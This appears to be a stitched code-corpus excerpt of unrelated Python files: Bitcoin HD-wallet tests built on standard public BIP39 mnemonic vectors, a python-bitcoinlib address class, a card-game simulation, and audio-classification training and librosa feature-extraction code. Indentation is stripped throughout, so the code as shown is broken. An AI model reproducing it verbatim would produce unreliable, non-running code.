"035895f2f481b1b0f01fcf8c289c794660b289981a78f8106447707fdd9666ca06da5a9a565181599b79f53b844d8a71dd9f439c52a3d7b3e8a79c906ac845fa",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth useful legal will",
"f2b94508732bcbacbcc020faefecfc89feafa6649a5491b8c952cede496c214a0c7b3c392d168748f2d4a612bada0753b52a1c7ac53c1e93abd5c6320b9e95dd",
"<KEY>"
], [
"808080808080808080808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic avoid letter always",
"<KEY>",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo when",
"<KEY>",
"<KEY>"
], [
"0000000000000000000000000000000000000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon art",
"bda85446c68413707090a52022edd26a1c9462295029f2e60cd7c4f2bbd3097170af7a4d73245cafa9c3cca8d561a7c3de6f5d4a10be8ed2a5e608d68f92fcc8",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth title",
"<KEY>",
"<KEY>"
], [
"8080808080808080808080808080808080808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic bless",
"c0c519bd0e91a2ed54357d9d1ebef6f5af218a153624cf4f2da911a0ed8f7a09e2ef61af0aca007096df430022f7a2b6fb91661a9589097069720d015e4e982f",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo vote",
"<KEY>",
"<KEY>"
], [
"9e885d952ad362caeb4efe34a8e91bd2",
"ozone drill grab fiber curtain grace pudding thank cruise elder eight picnic",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"gravity machine north sort system female filter attitude volume fold club stay feature office ecology stable narrow fog",
"<KEY>",
"<KEY>"
], [
"68a79eaca2324873eacc50cb9c6eca8cc68ea5d936f98787c60c7ebc74e6ce7c",
"hamster diagram private dutch cause delay private meat slide toddler razor book happy fancy gospel tennis maple dilemma loan word shrug inflict delay length",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"scheme spot photo card baby mountain device kick cradle pact join borrow",
"ea725895aaae8d4c1cf682c1bfd2d358d52ed9f0f0591131b559e2724bb234fca05aa9c02c57407e04ee9dc3b454aa63fbff483a8b11de949624b9f1831a9612",
"<KEY>"
], [
"<KEY>",
"horn tenant knee talent sponsor spell gate clip pulse soap slush warm silver nephew swap uncle crack brave",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"panda eyebrow bullet gorilla call smoke muffin taste mesh discover soft ostrich alcohol speed nation flash devote level hobby quick inner drive ghost inside",
"<KEY>",
"<KEY>"
], [
"23db8160a31d3e0dca3688ed941adbf3",
"cat swing flag economy stadium alone churn speed unique patch report train",
"deb5f45449e615feff5640f2e49f933ff51895de3b4381832b3139941c57b59205a42480c52175b6efcffaa58a2503887c1e8b363a707256bdd2b587b46541f5",
"<KEY>"
], [
"8197a4a47f0425faeaa69deebc05ca29c0a5b5cc76ceacc0",
"light rule cinnamon wrap drastic word pride squirrel upgrade then income fatal apart sustain crack supply proud access",
"4cbdff1ca2db800fd61cae72a57475fdc6bab03e441fd63f96dabd1f183ef5b782925f00105f318309a7e9c3ea6967c7801e46c8a58082674c860a37b93eda02",
"<KEY>"
], [
"066dca1a2bb7e8a1db2832148ce9933eea0f3ac9548d793112d9a95c9407efad",
"all hour make first leader extend hole alien behind guard gospel lava path output census museum junior mass reopen famous sing advance salt reform",
"<KEY>",
"<KEY>"
], [
"f30f8c1da665478f49b001d94c5fc452",
"vessel ladder alter error federal sibling chat ability sun glass valve picture",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"scissors invite lock maple supreme raw rapid void congress muscle digital elegant little brisk hair mango congress clump",
"7b4a10be9d98e6cba265566db7f136718e1398c71cb581e1b2f464cac1ceedf4f3e274dc270003c670ad8d02c4558b2f8e39edea2775c9e232c7cb798b069e88",
"<KEY>"
], [
"<KEY>",
"void come effort suffer camp survey warrior heavy shoot primary clutch crush open amazing screen patrol group space point ten exist slush involve unfold",
"01f5bced59dec48e362f2c45b5de68b9fd6c92c6634f44d6d40aab69056506f0e35524a518034ddc1192e1dacd32c1ed3eaa3c3b131c88ed8e7e54c49a5d0998",
"<KEY>"
]
]
for entropy, mnemonic, seed, xprv in tests:
private_key = HDPrivateKey.from_mnemonic(mnemonic, b'TREZOR')
self.assertEqual(private_key.xprv(), xprv)
def test_bip49(self):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
password = b''
path = 'm'
hd_private_key = HDPrivateKey.from_mnemonic(mnemonic, password, path=path, testnet=True)
want = '<KEY>'
self.assertEqual(hd_private_key.xprv(), want)
account0 = hd_private_key.child((1 << 31) + 49).child((1 << 31) + 1).child(1 << 31)
want = '<KEY>'
self.assertEqual(account0.xprv(), want)
account0_pub = account0.pub
account0_first_key = account0.child(0).child(0)
pub_first_key = account0_pub.traverse('/0/0')
want = '<KEY>'
self.assertEqual(account0_first_key.wif(), want)
want = 0xc9bdb49cfbaedca21c4b1f3a7803c34636b1d7dc55a717132443fc3f4c5867e8
self.assertEqual(account0_first_key.private_key.secret, want)
want = bytes.fromhex('03a1af804ac108a8a51782198c2d034b28bf90c8803f5a53f76276fa69a4eae77f')
self.assertEqual(account0_first_key.private_key.point.sec(), want)
self.assertEqual(pub_first_key.address(), account0_first_key.address())
def test_bech32_address(self):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
password = b''
path = 'm/84\'/0\'/0\''
account = HDPrivateKey.from_mnemonic(mnemonic, password, path=path, testnet=False)
want = '<KEY>'
self.assertEqual(account.zprv(), want)
want = '<KEY>'
self.assertEqual(account.zpub(), want)
first_key = account.child(0).child(0)
want = '<KEY>'
self.assertEqual(first_key.bech32_address(), want)
def test_zprv(self):
mnemonic, priv = HDPrivateKey.generate(entropy=1 << 128)
for word in mnemonic.split():
self.assertTrue(word in WORD_LIST)
zprv = priv.zprv()
self.assertTrue(zprv.startswith('zprv'))
zpub = priv.pub.zpub()
self.assertTrue(zpub.startswith('zpub'))
derived = HDPrivateKey.parse(zprv)
self.assertEqual(zprv, derived.zprv())
mnemonic, priv = HDPrivateKey.generate(testnet=True)
zprv = priv.zprv()
self.assertTrue(zprv.startswith('vprv'))
zpub = priv.pub.zpub()
self.assertTrue(zpub.startswith('vpub'))
xpub = priv.pub.xpub()
self.assertTrue(xpub.startswith('tpub'))
derived = HDPrivateKey.parse(zprv)
self.assertEqual(zprv, derived.zprv())
derived_pub = HDPublicKey.parse(zpub)
self.assertEqual(zpub, derived_pub.zpub())
with self.assertRaises(ValueError):
bad_zprv = encode_base58_checksum(b'\x00' * 78)
HDPrivateKey.parse(bad_zprv)
with self.assertRaises(ValueError):
bad_zpub = encode_base58_checksum(b'\x00' * 78)
HDPublicKey.parse(bad_zpub)
with self.assertRaises(ValueError):
derived_pub.child(1 << 31)
def test_errors(self):
with self.assertRaises(ValueError):
HDPrivateKey.from_mnemonic('hello')
with self.assertRaises(ValueError):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon'
HDPrivateKey.from_mnemonic(mnemonic)
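# --- Illustrative usage sketch (not part of the original tests; names taken from the API above) ---
# mnemonic, priv = HDPrivateKey.generate()            # create a new wallet
# xpub = priv.pub.xpub()                              # export the public branch
# hd_pub = HDPublicKey.parse(xpub)                    # watch-only side
# addr = hd_pub.traverse('m/0/5').bech32_address()    # unhardened derivation only;
#                                                     # hardened paths like "m/0'" raise ValueError here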
``` |
{
"source": "jimmysong/python-bitcoinlib",
"score": 3
} |
#### File: python-bitcoinlib/bitcoin/wallet.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import bitcoin
import bitcoin.base58
import bitcoin.core.script as script
class CBitcoinAddress(bitcoin.base58.CBase58Data):
"""A Bitcoin address"""
def to_scriptPubKey(self):
"""Convert an address to a scriptPubKey"""
if self.nVersion == bitcoin.params.BASE58_PREFIXES['PUBKEY_ADDR']:
return script.CScript([script.OP_DUP, script.OP_HASH160, self, script.OP_EQUALVERIFY, script.OP_CHECKSIG])
elif self.nVersion == bitcoin.params.BASE58_PREFIXES['SCRIPT_ADDR']:
return script.CScript([script.OP_HASH160, self, script.OP_EQUAL])
else:
raise ValueError("CBitcoinAddress: Don't know how to convert version %d to a scriptPubKey" % self.nVersion)
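# --- Illustrative usage sketch (assumes python-bitcoinlib with mainnet params selected) ---
# addr = CBitcoinAddress('1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa')  # genesis coinbase address
# script_pubkey = addr.to_scriptPubKey()  # -> OP_DUP OP_HASH160 <hash160> OP_EQUALVERIFY OP_CHECKSIG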
``` |
{
"source": "jimmysteinmetz/beat-the-deck",
"score": 4
} |
#### File: jimmysteinmetz/beat-the-deck/btd_one_play.py
```python
from random import shuffle
from random import randint
suit = range(1,13)
deck = []
for i in suit:
for n in range(0,4):
deck.append(i)
shuffle(deck)
stacks = deck[0:9]
cards_in_play = deck[9:]
def eval_call(faceup, drawn):
outcome = None
midpoint = 8
my_call = "ABOVE"
if faceup > midpoint:
my_call = "BELOW"
elif faceup == midpoint:
if randint(1, 100) <= 50:  # fair 50/50 tie-break when the face-up card equals the midpoint
my_call = "BELOW"
#print(my_call)
if my_call == "BELOW":
if drawn < faceup:
outcome = drawn
else:
if drawn > faceup:
outcome = drawn
else:
outcome = None
print(faceup)
print(my_call)
print(drawn)
print("----")
return outcome
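# Worked example of the call logic above (illustrative, not in the original script):
#   eval_call(11, 4) -> face-up 11 > midpoint 8, so the call is "BELOW"; 4 is below 11,
#                       so 4 is returned as the new face-up card.
#   eval_call(3, 2)  -> face-up 3 <= 8, so the call is "ABOVE"; 2 is not above 3,
#                       so None is returned and the stack is considered lost.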
def next_card(playing_deck):
cards_left = len(playing_deck)
if cards_left > 0:
new_card = playing_deck[0]
new_deck = playing_deck[1:]
return new_card, new_deck
counter = 1
for stack in stacks:
print("starting deck " + str(counter))
# print(stack)
# print(eval_call(stack,1))
status = "LIVE"
while status == "LIVE":
#print(type(cards_in_play))
if len(cards_in_play) == 0:
status = "WIN"
break
next_card_cur, cards_in_play = next_card(cards_in_play)
#print(stack)
stack = eval_call(stack, next_card_cur)
#print(next_card_cur)
if stack is None:
status = "NEXT"
if len(cards_in_play) == 0:
print("WIN")
break
counter += 1
print(str(len(cards_in_play))+ " cards remaining")
'''
stack = eval_call(stack, next_card(cards_in_play)[0])
if len(cards_in_play) == 0:
print("winner")
status == "win"
elif type(stack) == type(None):
status == "next deck"
print(status)
'''
``` |
{
"source": "jimmystique/AudioClassification",
"score": 3
} |
#### File: AudioClassification/src/deep_learning_train.py
```python
import yaml
import argparse
from utils import split_data
import numpy as np
from tensorflow.keras import layers, models
from keras.utils import to_categorical
from tensorflow import keras
import tensorflow as tf
import os
import pandas as pd
from sklearn.metrics import accuracy_score
from kymatio.keras import Scattering1D
#Shapes list:
#------------
# Basic preprocessed : (30000,8000)
# MFCC : (30000,20,16)
# Chroma_stft : (30000, 12, 16)
# Root Mean Square : (30000, 1, 16)
def fast_cnn(n_classes=10, sequence_length=8000):
""" Fast CNN to use for experiments
Args:
n_classes (int): Number of classes
sequence_length (int): Length of input sequences
Returns:
(keras model): Model that groups layers into an object with training and inference features.
"""
inputs = keras.Input(shape=(sequence_length, 1), name="record")
x = layers.Conv1D(filters=1, kernel_size=1, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(inputs)
x = layers.Flatten()(x)
prediction = layers.Dense(n_classes, activation='softmax')(x)  # use the n_classes argument rather than a hard-coded 10
model = models.Model(inputs=inputs, outputs=prediction)
return model
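# Minimal usage sketch of the factory above (illustrative only):
#   model = fast_cnn(n_classes=10, sequence_length=8000)
#   model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
#   model.summary()  # expects inputs of shape (batch, 8000, 1) and one-hot targets of shape (batch, 10)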
def audionet(n_classes=10, sequence_length=8000, pool_size=2, pool_strides=2):
""" AudioNet CNN
Args:
n_classes (int): Number of classes to be predicted
sequence_length (int): Length of inputs sequences
pool_size (int): Size of the max pooling window
pool_strides (int): Specifies how much the pooling window moves for each pooling step. If None, it will default to pool_size
Returns:
(keras model): Model that groups layers into an object with training and inference features.
"""
inputs = keras.Input(shape=(sequence_length, 1), name="record")
x = layers.Conv1D(filters=100, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(inputs)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=64, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Conv1D(filters=128, kernel_size=3, strides=1, activation='relu', padding='valid', dilation_rate=1, use_bias=True)(x)
x = layers.MaxPooling1D(pool_size=2, strides=2, padding='same')(x)
x = layers.Flatten()(x)
x = layers.Dense(1024, activation="relu")(x)
x = layers.Dense(512, activation="relu")(x)
prediction = layers.Dense(n_classes, activation='softmax')(x)  # use the n_classes argument rather than a hard-coded 10
model = models.Model(inputs=inputs, outputs=prediction)
return model
def scattering_transform1d(n_classes, sequence_length):
""" Scattering transform
"""
log_eps = 1e-6
x_in = layers.Input(shape=(sequence_length,))
x = Scattering1D(8, 12)(x_in)
x = layers.Lambda(lambda x: x[..., 1:, :])(x)
x = layers.Lambda(lambda x: tf.math.log(tf.abs(x) + log_eps))(x)
x = layers.GlobalAveragePooling1D(data_format='channels_first')(x)
x = layers.BatchNormalization(axis=1)(x)
x_out = layers.Dense(n_classes, activation='softmax')(x)
model = tf.keras.models.Model(x_in, x_out)
return model
def scattering_transform1d_big(n_classes, sequence_length):
""" Scattering transform with more parameters
"""
log_eps = 1e-6
x_in = layers.Input(shape=(sequence_length,))
x = Scattering1D(8, 12)(x_in)
x = layers.Lambda(lambda x: x[..., 1:, :])(x)
x = layers.Lambda(lambda x: tf.math.log(tf.abs(x) + log_eps))(x)
x = layers.GlobalAveragePooling1D(data_format='channels_first')(x)
x = layers.BatchNormalization(axis=1)(x)
x = layers.Dense(512, activation='softmax')(x)
x_out = layers.Dense(n_classes, activation='softmax')(x)
model = tf.keras.models.Model(x_in, x_out)
return model
def train_dl_model(path_to_data, save_model_path, epochs, algorithm):
# X_train, X_test, y_train, y_test = split_data(path_to_data, 0.33)
X_train, X_test, X_valid, y_train, y_test, y_valid = split_data(path_to_data, 0.33, 42, 0.2, True)
###################################################
#NORMALIZE FOR SCATTERING TRANSFORM ONLY
row_sums = np.array(X_train).sum(axis=1)
X_train = X_train / row_sums[:, np.newaxis]
row_sums = np.array(X_valid).sum(axis=1)
X_valid = X_valid / row_sums[:, np.newaxis]
row_sums = np.array(X_test).sum(axis=1)
X_test = X_test / row_sums[:, np.newaxis]
#####################################################
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
y_valid = to_categorical(y_valid)
model = globals()[algorithm["name"]](**algorithm["args"])
model.summary()
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=["accuracy"])
history = model.fit(np.array(X_train), np.array(y_train), batch_size=128, epochs=epochs, validation_data=(np.array(X_valid), np.array(y_valid)))
model.save(save_model_path)
hist_json_file = os.path.join(save_model_path, 'history.json')
with open(hist_json_file, mode='w') as f:
pd.DataFrame(history.history).to_json(f, indent=4)
# Evaluation
pred = model.predict(np.array(X_test))
print(np.mean(pred.argmax(1) == y_test.argmax(1)))
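# The `algorithm` argument is resolved via globals()[algorithm["name"]](**algorithm["args"]),
# so the "deep_learning_based_training" YAML entry is expected to look roughly like this
# (illustrative sketch; the concrete paths and values are assumptions):
#
# deep_learning_based_training:
#   path_to_data: data/preprocessed
#   save_model_path: models/audionet
#   epochs: 30
#   algorithm:
#     name: audionet
#     args:
#       n_classes: 10
#       sequence_length: 8000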
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
dl_based_training = yaml.safe_load(open(args.config_file))["deep_learning_based_training"]
# # features_based_model_train(**features_based_training)
train_dl_model(**dl_based_training)
```
#### File: AudioClassification/src/evaluate.py
```python
import pickle as pkl
import numpy as np
import argparse
import yaml
from utils import split_data
def evaluate_model(load_model_path, input_data_path, test_size, configuration):
X_train, X_test, y_train, y_test = split_data(input_data_path, test_size)
model = pkl.load(open(load_model_path, "rb" ))
flatten_train = []
flatten_test = []
for input in X_train:
flatten_train.append(input.flatten())
for input in X_test:
flatten_test.append(input.flatten())
pred_test = model.predict(flatten_test)
print("Testing accuracy for {}: {}".format(configuration,np.mean(np.array(pred_test) == np.array(y_test))))
pred_train = model.predict(flatten_train)
print("Training accuracy for {}: {}".format(configuration,np.mean(np.array(pred_train) == np.array(y_train))))
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
evaluation_cfg = yaml.safe_load(open(args.config_file))["evaluation"]
#Evaluate spectrogram rf
evaluate_model(evaluation_cfg['spectrogram_rf_model_save_path'], evaluation_cfg['spectrogram_data_path'], evaluation_cfg['test_size'], "spectrogram representation with random forest")
#Evaluate mfcc rf
evaluate_model(evaluation_cfg['mfcc_rf_model_save_path'], evaluation_cfg['mfcc_data_path'], evaluation_cfg['test_size'], "MFCC with random forest")
#Evaluate spectrogram descriptor rf
evaluate_model(evaluation_cfg['spectrogram_descriptors_rf_model_save_path'], evaluation_cfg['spectrogram_descriptors_data_path'], evaluation_cfg['test_size'], "spectrogram descriptors with random forest")
# load_model_path = "models/model.pkl"
# model = pkl.load(open(load_model_path, "rb" ))
```
#### File: AudioClassification/src/features_extraction.py
```python
from librosa.feature import chroma_stft, rms, mfcc, spectral_centroid, spectral_bandwidth, spectral_flatness, spectral_rolloff
from librosa import feature
from librosa import stft, amplitude_to_db, magphase
import argparse
import yaml
import os
import multiprocessing
import pickle as pkl
import numpy as np
from utils import ensure_dir
import time
import datetime
import socket
def chroma_stft(processed_data_path, save_path, n_processes, sr=22050, S=None, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect', tuning=None, n_chroma=12):
""" Extract chroma features using STFT on all files at processed_data_path and save the extracted features at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
n_processes (int): Number of processes to run in parallel to extract features faster
sr (int): sampling rate
S (np.ndarray): power spectrogram
norm (float or None): column-wise normalization
n_fft (int): FFT window size
hop_length (int): hop length
win_length (int): Each frame of audio is windowed by window(). The window will be of length win_length and then padded with zeros to match n_fft.
window (string, tuple, number, function, or np.ndarray [shape=(n_fft,)]): - a window specification (string, tuple, or number); see scipy.signal.get_window
- a window function, such as scipy.signal.windows.hann
- a vector or array of length n_fft
center (bool): - if True, the signal y is padded so that frame t is centered at y[t * hop_length].
- if False, then frame t begins at y[t * hop_length]
pad_mode (str): If center=True, the padding mode to use at the edges of the signal. By default, STFT uses reflection padding.
tuning (float): Deviation from A440 tuning in fractional chroma bins. If None, it is automatically estimated.
n_chroma (int): Number of chroma bins to produce (12 by default).
"""
print("Extracting Chroma Features with Short Time Fourier Transform ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_chroma_stft, [[processed_file_path, save_path, sr, S, n_fft, hop_length, win_length, window, center, pad_mode, tuning, n_chroma] for processed_file_path in processed_data_files], chunksize=1)
def _chroma_stft(processed_file_path, save_path, sr, S, n_fft, hop_length, win_length, window, center, pad_mode, tuning, n_chroma):
""" Extract chroma features for the file at processed_file_path and save the features extracted at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
sr (int): sampling rate
S (np.ndarray): power spectrogram
norm (float or None): column-wise normalization
n_fft (int): FFT window size
hop_length (int): hop length
win_length (int): Each frame of audio is windowed by window(). The window will be of length win_length and then padded with zeros to match n_fft.
window (string, tuple, number, function, or np.ndarray [shape=(n_fft,)]): - a window specification (string, tuple, or number); see scipy.signal.get_window
- a window function, such as scipy.signal.windows.hann
- a vector or array of length n_fft
center (bool): - if True, the signal y is padded so that frame t is centered at y[t * hop_length].
- if False, then frame t begins at y[t * hop_length]
pad_mode (str): If center=True, the padding mode to use at the edges of the signal. By default, STFT uses reflection padding.
tuning (float): Deviation from A440 tuning in fractional chroma bins. If None, it is automatically estimated.
n_chroma (int): Number of chroma bins to produce (12 by default).
"""
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.chroma_stft(y=data, sr=sr, S=S, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode, tuning=tuning, n_chroma=n_chroma)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_chroma_stft_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Chroma stft features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def root_mean_square(processed_data_path, save_path, n_processes, S=None, frame_length=2048, hop_length=512, center=True, pad_mode='reflect'):
print("Extracting features with Root Mean Square ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_root_mean_square, [[processed_file_path, save_path, S, frame_length, hop_length, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _root_mean_square(processed_file_path, save_path, S, frame_length, hop_length, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.rms(y=data, S=S, frame_length=frame_length, hop_length=hop_length, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_rms_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- RMS features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def mfcc(processed_data_path, save_path, n_processes, sr=22050, S=None, n_mfcc=20, dct_type=2, norm='ortho', lifter=0):
print("Extracting features with MFCC ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_mfcc, [[processed_file_path, save_path, sr, S, n_mfcc, dct_type, norm, lifter] for processed_file_path in processed_data_files], chunksize=1)
def _mfcc(processed_file_path, save_path, sr, S, n_mfcc, dct_type, norm, lifter):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features = feature.mfcc(y=data, sr=sr, n_mfcc=n_mfcc, dct_type=dct_type, norm=norm, lifter=lifter)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_mfcc_features.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- MFCC features extraction on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram(processed_data_path, save_path, n_processes, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Generating spectrograms ...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram, [[processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram(processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
audio_data_stft_format = stft(y=data, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
data_extracted_features= amplitude_to_db(abs(audio_data_stft_format))
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Generating spectrogram on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_centroid(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram centroid...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_centroid, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_centroid(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_centroid(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_centroid.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram centroid on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_bandwith(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram bandwith...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_bandwith, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_bandwith(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_bandwidth(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_bandwith.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram bandwith on {} Saved in {}".format(processed_file_path, save_file_path))
def spectrogram_flatness(processed_data_path, save_path, n_processes, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram flatness...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_flatness, [[processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_flatness(processed_file_path, save_path, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_flatness(data, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_flatness.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram flatness on {} Saved in {}".format(processed_file_path, save_file_path))
